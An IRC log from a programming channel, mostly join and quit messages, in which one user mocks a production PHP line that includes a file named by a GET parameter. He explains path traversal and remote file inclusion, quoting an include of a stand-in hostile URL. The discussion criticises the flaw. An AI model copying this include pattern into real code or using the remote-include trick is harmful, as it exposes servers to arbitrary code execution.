--- Log opened Sat Apr 16 00:00:43 2011 |
00:08 | | You're now known as TheWatcher[T-2] |
00:12 | | You're now known as TheWatcher[zZzZ] |
00:27 | | celmin|away is now known as celticminstrel |
00:32 | < ToxicFrog> | :gonk: |
00:32 | < ToxicFrog> | ACTUAL PRODUCTION PHP CODE: |
00:32 | < ToxicFrog> | include "pages/" . $_GET['page'] . '.php'; |
00:32 | < celticminstrel> | o.O |
00:33 | < ToxicFrog> | Exercise for the reader: Assume that this is saved as /index.php. What happens when a browser requests "/index.php?page=../index.php"? |
00:33 | < celticminstrel> | Infinite include loop! |
00:34 | < ToxicFrog> | Bonus extra wtf: without the leading "pages/", this lets people execute arbitrary PHP code (which also means arbitrary shell code, which means absolutely anything they fucking want) on your server. |
00:34 | < ToxicFrog> | Because 'include "http://www.rootkits.net/deathmachine.php"' will in fact download and execute that script. |
00:35 | < ToxicFrog> | Reading the Coding Horrors thread is not good for my sanity. |
00:35 | < celticminstrel> | Huh, I did not know that. |
00:36 | < celticminstrel> | (That you can include a remote script, I mean.) |
00:36 | < celticminstrel> | Still, the leading "pages/" looks like it makes that impossible, unless I'm missing something. |
00:36 | < ToxicFrog> | It does. |
00:37 | < ToxicFrog> | Unless you have a host in DNS that answers to the name 'pages', anyways. |
00:38 | < celticminstrel> | So it will only let the user execute any script actually stored on the server. Which is still pretty bad though. |
00:42 | < ToxicFrog> | Yes. As I said. |
00:42 | < ToxicFrog> | Fucking PHP. |
01:06 | < gnolam> | Pfft. This is not PHP's fault. It's the coder's. |
01:08 | < ToxicFrog> | While the immediate blame rests on the coder, PHP gets a whole fucking pile of opprobrium for actively encouraging shit like this. |
01:08 | < ToxicFrog> | Largely by billing itself as a "web-ready and web-oriented" language and then failing to include basic fucking safety and security features (and in some cases actively working against them). |
01:09 | < ToxicFrog> | It's still possible to make this sort of mistake in, say, Django, or Lift, but you have to know that's what you're doing. |
01:11 | < ToxicFrog> | PHP, on the other hand - in addition to being a security clusterfuck in and of itself - doesn't include any of the very basic features that these frameworks do, despite its advertising. |
01:12 | < ToxicFrog> | So people - often well-meaning but tragically misguided people - roll their own. |
01:12 | < ToxicFrog> | And 90% of the time they get it wrong, because if they had the background to get it right they probably wouldn't be using PHP. |
01:13 | < gnolam> | ... Framework VS Language. You don't see the difference? :P |
01:14 | < ToxicFrog> | Don't be obtuse, you know perfectly well what I'm saying. |
01:15 | < ToxicFrog> | PHP says (or clueless proponents of PHP - of which there are many - say) "you don't need an awkward framework with a huge learning curve! Unlike all those other languages, PHP is built from the ground up for web apps! Just dive in and start coding!" |
01:16 | < ToxicFrog> | And conveniently leaves the fact that it was "built from the ground up for web apps" by people with brain damage and a pathological fear of ever removing a feature no matter how broken and dangerous it is. |
01:16 | < ToxicFrog> | *leaves out. |
01:24 | | Attilla [Some.Dude@Nightstar-92c9199f.cable.virginmedia.com] has quit [Ping timeout: 121 seconds] |
01:41 | | gnolam [lenin@9D46A2.F4E9D7.E4B4CF.2072AD] has quit [[NS] Quit: Z?] |
01:58 | | Stalker [Z@26ECB6.A4B64C.298B52.D80DA0] has quit [Ping timeout: 121 seconds] |
02:28 | | Kindamoody[zZz] is now known as Kindamoody |
02:42 | | Stalker [Z@3A600C.A966FF.5BF32D.8E7ABA] has joined #code |
03:35 | | Stalker [Z@3A600C.A966FF.5BF32D.8E7ABA] has quit [Ping timeout: 121 seconds] |
04:08 | | Kindamoody is now known as Kindamoody[zZz] |
06:10 | | celticminstrel [celticminstre@Nightstar-f8b608eb.cable.rogers.com] has quit [[NS] Quit: And lo! The computer falls into a deep sleep, to awake again some other day!] |
06:33 | | shade_of_cpux [chatzilla@Nightstar-c978de34.dyn.optonline.net] has joined #code |
06:33 | | shade_of_cpux is now known as cpux |
06:38 | | kwsn is now known as kwsn\t-2 |
06:40 | | kwsn\t-2 [kwsn@Nightstar-9d744862.dyn.centurytel.net] has quit [[NS] Quit: mo] |
06:50 | | cpux is now known as shade_of_cpux |
06:56 | < Alek> | "Will you do my term paper?" "What's the magic word?" "sudo" |
06:56 | | AnnoDomini [annodomini@D553D1.41311B.FD91D7.3AB41D] has joined #code |
06:57 | | Kindamoody[zZz] is now known as Kindamoody |
07:00 | < Alek> | "The cat fell asleep on my phone. Couldn't resist, IRCed a friend, 'Call me ASAP!'" |
07:08 | | Kindamoody is now known as Kindamoody|out |
08:18 | | shade_of_cpux [chatzilla@Nightstar-c978de34.dyn.optonline.net] has quit [Client closed the connection] |
08:37 | | Rhamphoryncus [rhamph@C06FE3.F5723C.BE3FEB.9D4666] has quit [Ping timeout: 121 seconds] |
08:40 | | Rhamphoryncus [rhamph@C06FE3.F5723C.BE3FEB.9D4666] has joined #code |
09:06 | | Attilla [Some.Dude@Nightstar-92c9199f.cable.virginmedia.com] has joined #code |
09:20 | | You're now known as TheWatcher |
11:23 | | Stalker [Z@3A600C.A966FF.5BF32D.8E7ABA] has joined #code |
12:29 | | gnolam [lenin@Nightstar-38637aa0.priv.bahnhof.se] has joined #code |
12:30 | | Rhamphoryncus [rhamph@C06FE3.F5723C.BE3FEB.9D4666] has quit [Client exited] |
15:03 | | shade_of_cpux [chatzilla@Nightstar-c978de34.dyn.optonline.net] has joined #code |
15:17 | | Stalker [Z@3A600C.A966FF.5BF32D.8E7ABA] has quit [Ping timeout: 121 seconds] |
15:17 | | You're now known as TheWatcher[afk] |
15:18 | | celticminstrel [celticminst@1526F6.37AB0D.97233B.788A64] has joined #code |
15:43 | | shade_of_cpux is now known as cpux |
16:09 | | Stalker [Z@26ECB6.A4B64C.298B52.D80DA0] has joined #code |
17:24 | | kwsn [kwsn@BAD19E.B5A83A.180240.E5184B] has joined #code |
17:27 | | Rhamphoryncus [rhamph@C06FE3.F5723C.BE3FEB.9D4666] has joined #code |
17:41 | | Attilla [Some.Dude@Nightstar-92c9199f.cable.virginmedia.com] has quit [[NS] Quit: ] |
18:20 | | kwsn [kwsn@BAD19E.B5A83A.180240.E5184B] has quit [[NS] Quit: brb reboot] |
18:53 | | kwsn [kwsn@Nightstar-9d744862.dyn.centurytel.net] has joined #code |
20:37 | < AnnoDomini> | How do I make chmod apply to subdirectories and their contents? |
20:38 | < AnnoDomini> | Alternatively, how do I change ownership of a folder and its contents? |
20:40 | < AnnoDomini> | Nevermind. |
20:42 | | Kindamoody|out is now known as Kindamoody |
21:50 | | kwsn is now known as kwsn\t-2 |
21:56 | | kwsn\t-2 is now known as kws-not-here |
22:49 | | You're now known as TheWatcher |
22:59 | | AnnoDomini [annodomini@D553D1.41311B.FD91D7.3AB41D] has quit [[NS] Quit: leaving] |
--- Log closed Sun Apr 17 00:00:57 2011 |